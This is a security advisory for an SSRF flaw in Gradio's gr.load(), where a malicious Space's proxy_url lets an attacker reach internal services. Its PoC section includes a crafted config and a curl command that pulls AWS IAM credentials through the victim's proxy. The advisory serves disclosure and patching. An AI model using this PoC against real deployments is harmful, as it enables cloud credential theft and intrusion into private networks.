GHSA-JMH7-G254-2CQ9
Vulnerability from github – Published: 2026-03-01 01:29 – Updated: 2026-03-01 01:29Summary
A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.
Details
The vulnerability exists in Gradio's config processing flow when loading external Spaces:
-
Config Fetching (
gradio/external.py:630):gr.load()callsBlocks.from_config()which fetches and processes the remote Space's configuration. -
Proxy URL Trust (
gradio/blocks.py:1231-1233): Theproxy_urlfrom the untrusted config is added directly toself.proxy_urls:python if config.get("proxy_url"): self.proxy_urls.add(config["proxy_url"]) -
Built-in Proxy Route (
gradio/routes.py:1029-1031): Every Gradio app automatically exposes a/proxy={url_path}endpoint:python @router.get("/proxy={url_path:path}", dependencies=[Depends(login_check)]) async def reverse_proxy(url_path: str): -
Host-based Validation (
gradio/routes.py:365-368): The validation only checks if the URL's host matches any trustedproxy_urlhost:python is_safe_url = any( url.host == httpx.URL(root).host for root in self.blocks.proxy_urls )
An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.
PoC
Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6
1. Attacker creates a malicious Gradio Space that returns this config:
{
"mode": "blocks",
"components": [...],
"proxy_url": "http://169.254.169.254/" # AWS metadata endpoint
}
2. Victim loads the malicious Space:
import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)
3. Attacker exploits the proxy:
# Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
Impact
Who is impacted:
- Any Gradio application that uses gr.load() to load external/untrusted Spaces
- HuggingFace Spaces that compose or embed other Spaces
- Enterprise deployments where Gradio apps have access to internal networks
Attack scenarios: - Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials - Internal service access: Reach databases, admin panels, and APIs on private networks - Network reconnaissance: Map internal infrastructure through the victim - Data exfiltration: Access sensitive internal APIs and services
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "gradio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28416"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-01T01:29:31Z",
"nvd_published_at": "2026-02-27T22:16:24Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure.\n\n### Details\n\nThe vulnerability exists in Gradio\u0027s config processing flow when loading external Spaces:\n\n1. **Config Fetching** (`gradio/external.py:630`): `gr.load()` calls `Blocks.from_config()` which fetches and processes the remote Space\u0027s configuration.\n\n2. **Proxy URL Trust** (`gradio/blocks.py:1231-1233`): The `proxy_url` from the untrusted config is added directly to `self.proxy_urls`:\n ```python\n if config.get(\"proxy_url\"):\n self.proxy_urls.add(config[\"proxy_url\"])\n ```\n\n3. **Built-in Proxy Route** (`gradio/routes.py:1029-1031`): Every Gradio app automatically exposes a `/proxy={url_path}` endpoint:\n ```python\n @router.get(\"/proxy={url_path:path}\", dependencies=[Depends(login_check)])\n async def reverse_proxy(url_path: str):\n ```\n\n4. **Host-based Validation** (`gradio/routes.py:365-368`): The validation only checks if the URL\u0027s host matches any trusted `proxy_url` host:\n ```python\n is_safe_url = any(\n url.host == httpx.URL(root).host for root in self.blocks.proxy_urls\n )\n ```\n\nAn attacker can set `proxy_url` to `http://169.254.169.254/` (AWS metadata) or any internal service, and the victim\u0027s server will proxy requests to those endpoints.\n\n### PoC\n\nFull PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6\n\n**1. Attacker creates a malicious Gradio Space** that returns this config:\n```python\n{\n \"mode\": \"blocks\",\n \"components\": [...],\n \"proxy_url\": \"http://169.254.169.254/\" # AWS metadata endpoint\n}\n```\n\n**2. Victim loads the malicious Space:**\n```python\nimport gradio as gr\ndemo = gr.load(\"attacker/malicious-space\")\ndemo.launch(server_name=\"0.0.0.0\", server_port=7860)\n```\n\n**3. Attacker exploits the proxy:**\n```bash\n# Fetch AWS credentials through victim\u0027s server\ncurl \"http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name\"\n```\n\n### Impact\n\n**Who is impacted:**\n- Any Gradio application that uses `gr.load()` to load external/untrusted Spaces\n- HuggingFace Spaces that compose or embed other Spaces\n- Enterprise deployments where Gradio apps have access to internal networks\n\n**Attack scenarios:**\n- **Cloud credential theft**: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials\n- **Internal service access**: Reach databases, admin panels, and APIs on private networks\n- **Network reconnaissance**: Map internal infrastructure through the victim\n- **Data exfiltration**: Access sensitive internal APIs and services",
"id": "GHSA-jmh7-g254-2cq9",
"modified": "2026-03-01T01:29:31Z",
"published": "2026-03-01T01:29:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28416"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/commit/fc7c01ea1e581ef70be98fddf003b0c91315c7cc"
},
{
"type": "PACKAGE",
"url": "https://github.com/gradio-app/gradio"
},
{
"type": "WEB",
"url": "https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.